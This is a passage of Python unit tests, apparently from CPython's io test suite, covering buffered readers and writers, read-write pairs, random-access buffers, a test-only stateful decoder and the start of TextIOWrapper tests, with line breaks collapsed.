rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(support.unlink, support.TESTFN) with support.check_warnings(('', ResourceWarning)): rawio = self.FileIO(support.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = self.MockRawIO() buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(support.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: support.unlink(support.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.write, b"def") def test_garbage_collection(self): # C BufferedWriter objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(support.unlink, support.TESTFN) with support.check_warnings(('', ResourceWarning)): rawio = self.FileIO(support.TESTFN, "w+b") f = self.tp(rawio) f.write(b"123xxx") f.x = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"123xxx") def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedWriter"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedWriterTest(BufferedWriterTest): tp = pyio.BufferedWriter class BufferedRWPairTest(unittest.TestCase): def test_constructor(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) def test_uninitialized(self): pair = self.tp.__new__(self.tp) del pair pair = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.read, 0) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.write, b'') pair.__init__(self.MockRawIO(), self.MockRawIO()) self.assertEqual(pair.read(0), b'') self.assertEqual(pair.write(b''), 0) def test_detach(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertRaises(self.UnsupportedOperation, pair.detach) def test_constructor_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12) def test_constructor_with_not_readable(self): class NotReadable(MockRawIO): def readable(self): return False self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO()) def test_constructor_with_not_writeable(self): class NotWriteable(MockRawIO): def writable(self): return False self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable()) def test_read(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read(3), b"abc") self.assertEqual(pair.read(1), b"d") self.assertEqual(pair.read(), b"ef") pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO()) self.assertEqual(pair.read(None), b"abc") def test_readlines(self): pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO()) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"]) def test_read1(self): # .read1() is delegated to the underlying reader object, so this test # can be shallow. pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read1(3), b"abc") self.assertEqual(pair.read1(), b"def") def test_readinto(self): for method in ("readinto", "readinto1"): with self.subTest(method): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) data = byteslike(b'\0' * 5) self.assertEqual(getattr(pair, method)(data), 5) self.assertEqual(bytes(data), b"abcde") def test_write(self): w = self.MockRawIO() pair = self.tp(self.MockRawIO(), w) pair.write(b"abc") pair.flush() buffer = bytearray(b"def") pair.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data pair.flush() self.assertEqual(w._write_stack, [b"abc", b"def"]) def test_peek(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertTrue(pair.peek(3).startswith(b"abc")) self.assertEqual(pair.read(3), b"abc") def test_readable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.readable()) def test_writeable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.writable()) def test_seekable(self): # BufferedRWPairs are never seekable, even if their readers and writers # are. pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.seekable()) # .flush() is delegated to the underlying writer object and has been # tested in the test_write method. def test_close_and_closed(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) pair.close() self.assertTrue(pair.closed) def test_reader_close_error_on_close(self): def reader_close(): reader_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertTrue(pair.closed) self.assertFalse(reader.closed) self.assertTrue(writer.closed) # Silence destructor error reader.close = lambda: None def test_writer_close_error_on_close(self): def writer_close(): writer_non_existing reader = self.MockRawIO() writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('writer_non_existing', str(err.exception)) self.assertFalse(pair.closed) self.assertTrue(reader.closed) self.assertFalse(writer.closed) # Silence destructor error writer.close = lambda: None writer = None # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception with support.catch_unraisable_exception(): # Ignore BufferedRWPair unraisable exception with support.catch_unraisable_exception(): pair = None support.gc_collect() support.gc_collect() def test_reader_writer_close_error_on_close(self): def reader_close(): reader_non_existing def writer_close(): writer_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('writer_non_existing', str(err.exception.__context__)) self.assertFalse(pair.closed) self.assertFalse(reader.closed) self.assertFalse(writer.closed) # Silence destructor error reader.close = lambda: None writer.close = lambda: None def test_isatty(self): class SelectableIsAtty(MockRawIO): def __init__(self, isatty): MockRawIO.__init__(self) self._isatty = isatty def isatty(self): return self._isatty pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False)) self.assertFalse(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) def test_weakref_clearing(self): brw = self.tp(self.MockRawIO(), self.MockRawIO()) ref = weakref.ref(brw) brw = None ref = None # Shouldn't segfault. class CBufferedRWPairTest(BufferedRWPairTest): tp = io.BufferedRWPair class PyBufferedRWPairTest(BufferedRWPairTest): tp = pyio.BufferedRWPair class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest): read_mode = "rb+" write_mode = "wb+" def test_constructor(self): BufferedReaderTest.test_constructor(self) BufferedWriterTest.test_constructor(self) def test_uninitialized(self): BufferedReaderTest.test_uninitialized(self) BufferedWriterTest.test_uninitialized(self) def test_read_and_write(self): raw = self.MockRawIO((b"asdf", b"ghjk")) rw = self.tp(raw, 8) self.assertEqual(b"as", rw.read(2)) rw.write(b"ddd") rw.write(b"eee") self.assertFalse(raw._write_stack) # Buffer writes self.assertEqual(b"ghjk", rw.read()) self.assertEqual(b"dddeee", raw._write_stack[0]) def test_seek_and_tell(self): raw = self.BytesIO(b"asdfghjkl") rw = self.tp(raw) self.assertEqual(b"as", rw.read(2)) self.assertEqual(2, rw.tell()) rw.seek(0, 0) self.assertEqual(b"asdf", rw.read(4)) rw.write(b"123f") rw.seek(0, 0) self.assertEqual(b"asdf123fl", rw.read()) self.assertEqual(9, rw.tell()) rw.seek(-4, 2) self.assertEqual(5, rw.tell()) rw.seek(2, 1) self.assertEqual(7, rw.tell()) self.assertEqual(b"fl", rw.read(11)) rw.flush() self.assertEqual(b"asdf123fl", raw.getvalue()) self.assertRaises(TypeError, rw.seek, 0.0) def check_flush_and_read(self, read_func): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) self.assertEqual(b"ab", read_func(bufio, 2)) bufio.write(b"12") self.assertEqual(b"ef", read_func(bufio, 2)) self.assertEqual(6, bufio.tell()) bufio.flush() self.assertEqual(6, bufio.tell()) self.assertEqual(b"ghi", read_func(bufio)) raw.seek(0, 0) raw.write(b"XYZ") # flush() resets the read buffer bufio.flush() bufio.seek(0, 0) self.assertEqual(b"XYZ", read_func(bufio, 3)) def test_flush_and_read(self): self.check_flush_and_read(lambda bufio, *args: bufio.read(*args)) def test_flush_and_readinto(self): def _readinto(bufio, n=-1): b = bytearray(n if n >= 0 else 9999) n = bufio.readinto(b) return bytes(b[:n]) self.check_flush_and_read(_readinto) def test_flush_and_peek(self): def _peek(bufio, n=-1): # This relies on the fact that the buffer can contain the whole # raw stream, otherwise peek() can return less. b = bufio.peek(n) if n != -1: b = b[:n] bufio.seek(len(b), 1) return b self.check_flush_and_read(_peek) def test_flush_and_write(self): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) bufio.write(b"123") bufio.flush() bufio.write(b"45") bufio.flush() bufio.seek(0, 0) self.assertEqual(b"12345fghi", raw.getvalue()) self.assertEqual(b"12345fghi", bufio.read()) def test_threads(self): BufferedReaderTest.test_threads(self) BufferedWriterTest.test_threads(self) def test_writes_and_peek(self): def _peek(bufio): bufio.peek(1) self.check_writes(_peek) def _peek(bufio): pos = bufio.tell() bufio.seek(-1, 1) bufio.peek(1) bufio.seek(pos, 0) self.check_writes(_peek) def test_writes_and_reads(self): def _read(bufio): bufio.seek(-1, 1) bufio.read(1) self.check_writes(_read) def test_writes_and_read1s(self): def _read1(bufio): bufio.seek(-1, 1) bufio.read1(1) self.check_writes(_read1) def test_writes_and_readintos(self): def _read(bufio): bufio.seek(-1, 1) bufio.readinto(bytearray(1)) self.check_writes(_read) def test_write_after_readahead(self): # Issue #6629: writing after the buffer was filled by readahead should # first rewind the raw stream. for overwrite_size in [1, 5]: raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 4) # Trigger readahead self.assertEqual(bufio.read(1), b"A") self.assertEqual(bufio.tell(), 1) # Overwriting should rewind the raw stream if it needs so bufio.write(b"B" * overwrite_size) self.assertEqual(bufio.tell(), overwrite_size + 1) # If the write size was smaller than the buffer size, flush() and # check that rewind happens. bufio.flush() self.assertEqual(bufio.tell(), overwrite_size + 1) s = raw.getvalue() self.assertEqual(s, b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size)) def test_write_rewind_write(self): # Various combinations of reading / writing / seeking backwards / writing again def mutate(bufio, pos1, pos2): assert pos2 >= pos1 # Fill the buffer bufio.seek(pos1) bufio.read(pos2 - pos1) bufio.write(b'\x02') # This writes earlier than the previous write, but still inside # the buffer. bufio.seek(pos1) bufio.write(b'\x01') b = b"\x80\x81\x82\x83\x84" for i in range(0, len(b)): for j in range(i, len(b)): raw = self.BytesIO(b) bufio = self.tp(raw, 100) mutate(bufio, i, j) bufio.flush() expected = bytearray(b) expected[j] = 2 expected[i] = 1 self.assertEqual(raw.getvalue(), expected, "failed result for i=%d, j=%d" % (i, j)) def test_truncate_after_read_or_write(self): raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 100) self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled self.assertEqual(bufio.truncate(), 2) self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases self.assertEqual(bufio.truncate(), 4) def test_misbehaved_io(self): BufferedReaderTest.test_misbehaved_io(self) BufferedWriterTest.test_misbehaved_io(self) def test_interleaved_read_write(self): # Test for issue #12213 with self.BytesIO(b'abcdefgh') as raw: with self.tp(raw, 100) as f: f.write(b"1") self.assertEqual(f.read(1), b'b') f.write(b'2') self.assertEqual(f.read1(1), b'd') f.write(b'3') buf = bytearray(1) f.readinto(buf) self.assertEqual(buf, b'f') f.write(b'4') self.assertEqual(f.peek(1), b'h') f.flush() self.assertEqual(raw.getvalue(), b'1b2d3f4h') with self.BytesIO(b'abc') as raw: with self.tp(raw, 100) as f: self.assertEqual(f.read(1), b'a') f.write(b"2") self.assertEqual(f.read(1), b'c') f.flush() self.assertEqual(raw.getvalue(), b'a2c') def test_interleaved_readline_write(self): with self.BytesIO(b'ab\ncdef\ng\n') as raw: with self.tp(raw) as f: f.write(b'1') self.assertEqual(f.readline(), b'b\n') f.write(b'2') self.assertEqual(f.readline(), b'def\n') f.write(b'3') self.assertEqual(f.readline(), b'\n') f.flush() self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n') # You can't construct a BufferedRandom over a non-seekable stream. test_unseekable = None # writable() returns True, so there's no point to test it over # a writable stream. test_truncate_on_read_only = None class CBufferedRandomTest(BufferedRandomTest, SizeofTest): tp = io.BufferedRandom @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedRandomTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_garbage_collection(self): CBufferedReaderTest.test_garbage_collection(self) CBufferedWriterTest.test_garbage_collection(self) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedRandom"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedRandomTest(BufferedRandomTest): tp = pyio.BufferedRandom # To fully exercise seek/tell, the StatefulIncrementalDecoder has these # properties: # - A single output character can correspond to many bytes of input. # - The number of input bytes to complete the character can be # undetermined until the last input byte is received. # - The number of input bytes can vary depending on previous input. # - A single input byte can correspond to many characters of output. # - The number of output characters can be undetermined until the # last input byte is received. # - The number of output characters can vary depending on previous input. class StatefulIncrementalDecoder(codecs.IncrementalDecoder): """ For testing seek/tell behavior with a stateful, buffering decoder. Input is a sequence of words. Words may be fixed-length (length set by input) or variable-length (period-terminated). In variable-length mode, extra periods are ignored. Possible words are: - 'i' followed by a number sets the input length, I (maximum 99). When I is set to 0, words are space-terminated. - 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' self.buffer = bytearray() return output codecEnabled = False @classmethod def lookupTestDecoder(cls, name): if cls.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=cls) # Register the previous decoder for testing. # Disabled by default, tests will enable it. codecs.register(StatefulIncrementalDecoder.lookupTestDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, "ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = 